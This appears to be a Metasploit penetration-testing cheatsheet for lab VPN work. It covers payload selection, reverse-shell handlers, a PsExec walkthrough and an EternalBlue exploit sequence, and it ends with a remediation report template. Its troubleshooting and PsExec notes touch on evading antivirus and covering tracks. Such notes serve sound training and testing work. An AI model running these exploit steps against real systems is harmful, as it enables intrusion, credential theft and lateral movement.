🛡️ Methodology Checklist
- Identify target OS, architecture, and available attack vector
- Search for payload:
msfvenom --list payloads | grep -i [OS] - Staged vs stageless decision: use staged for lower initial footprint
- Set up handler:
use exploit/multi/handler; set PAYLOAD [PAYLOAD]; set LHOST/LPORT - Generate payload with msfvenom
- Deliver payload via exploit, upload, or social engineering
- Catch session and migrate to stable process
🎯 Operational Context
Use when: Selecting payload type for MSF exploit — choose between staged/stageless, architecture, and format before generating.
Think Dumber First: Staged (windows/meterpreter/reverse_tcp) requires network connection back for stage 2 — use only when reliable network. Stageless (windows/meterpreter_reverse_tcp) is self-contained — use when network is unreliable or port 4444 is blocked intermittently.
Skip when: Target has no MSF module — use standalone msfvenom payload.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo msfconsole | Launch Metasploit (root required for privileged ports) |
search smb | Search modules by keyword |
search type:exploit name:psexec | Filtered module search |
use exploit/windows/smb/psexec | Select module by full path |
use 56 | Select module by search result number |
show options | Display required and optional settings |
set RHOSTS [TARGET_IP] | Set remote target IP |
set LHOST tun0 | Set local (attacker) interface — always use tun0 for VPN |
set LPORT 4444 | Set local listener port |
set SMBUser [USER] | Set SMB username for authenticated exploits |
set SMBPass [PASS] | Set SMB password |
set payload windows/meterpreter/reverse_tcp | Switch to Meterpreter payload |
set payload windows/shell/reverse_tcp | Switch to plain CMD shell payload |
exploit | Run the selected module |
use auxiliary/scanner/smb/smb_ms17_010 | MS17-010 (EternalBlue) scanner |
use exploit/windows/smb/ms17_010_psexec | EternalBlue exploit (psexec variant — stable) |
sessions -l | List active sessions |
sessions -i 1 | Interact with session 1 |
🔬 Deep Dive & Workflow
MSF Standard Workflow
1. sudo msfconsole
2. search [keyword/CVE]
3. use [module]
4. show options
5. set RHOSTS [TARGET_IP]
6. set LHOST tun0
7. set LPORT [PORT]
8. exploit
Always use tun0 for LHOST when on HTB VPN — the module needs your VPN-facing IP, not your local LAN IP.
Module Rank Guide
| Rank | Meaning |
|---|---|
| Excellent | Reliable, won’t crash service |
| Great | Generally reliable |
| Good | Usually reliable |
| Normal | Default — may have limitations |
| Low | May crash or be unreliable |
| Manual | Requires manual steps |
PsExec Module Deep Dive (exploit/windows/smb/psexec)
How it works:
- Authenticates with
SMBUser/SMBPassusing valid admin credentials - Uploads a randomly named service executable to
ADMIN$ - Starts the service to execute the payload
- Shell connects back; service deleted to cover tracks
Why it fails:
ADMIN$requires Local Administrator rights — normal users can’t write there- Windows Defender detects the service binary on disk → use Meterpreter or
set target 0
Port Conflict — “Handler Failed to Bind”
If nc -lvnp 4444 is already running in another tab, MSF can’t bind its handler:
# Fix: change MSF listener port
set LPORT 5555Always check active listeners before running MSF.
Meterpreter vs Shell Payload
| Feature | Meterpreter | Generic Shell |
|---|---|---|
| Disk write | No (in-memory DLL injection) | Sometimes |
| Commands | upload, download, hashdump, getsystem | Basic stdin/stdout |
| Stealth | More network traffic; DPI-detectable | Simpler, smaller |
| AV bypass | Sometimes better | Sometimes smaller = less flagged |
| Best for | Post-exploitation operations | Quick foothold, AV evasion |
EternalBlue Workflow (MS17-010)
# Step 1: Scan
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS [TARGET_IP]
run
# Step 2: Exploit (psexec variant is stable)
use exploit/windows/smb/ms17_010_psexec
set RHOSTS [TARGET_IP]
set LHOST tun0
set payload windows/meterpreter/reverse_tcp
exploit🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Staged payload fails to get shell | Stage 2 download blocked | Switch to stageless payload (meterpreter_reverse_tcp not meterpreter/reverse_tcp) |
| Payload arch mismatch | 32-bit payload on 64-bit process | Use x64 payloads: windows/x64/meterpreter/reverse_tcp for 64-bit targets |
| MSF module shows ‘no session created’ | Firewall blocking callback | Test: nc -nvlp [LPORT] on attack box; if connection arrives, problem is in payload encoding |
| Handler disconnects immediately | Payload expiry | Add set ExitOnSession false and set AutoRunScript post/multi/manage/shell_to_meterpreter |
| Multiple sessions created simultaneously | AutoRun on multi-target | Use set MaxSession 1 or manage per workspace |
📝 Reporting Trigger
Finding Title: Metasploit Payload Delivery Achieves Remote Code Execution Impact: MSF payload execution provides interactive Meterpreter session with full post-exploitation capabilities including credential dumping, pivoting, persistence, and lateral movement. Root Cause: Exploitable service running as privileged user with no EDR detection of Meterpreter staged payload delivery. Recommendation: Deploy EDR capable of detecting Meterpreter stage 2 download patterns and shellcode injection. Implement network-level detection for Meterpreter communication patterns. Patch vulnerable services and apply least-privilege to service accounts.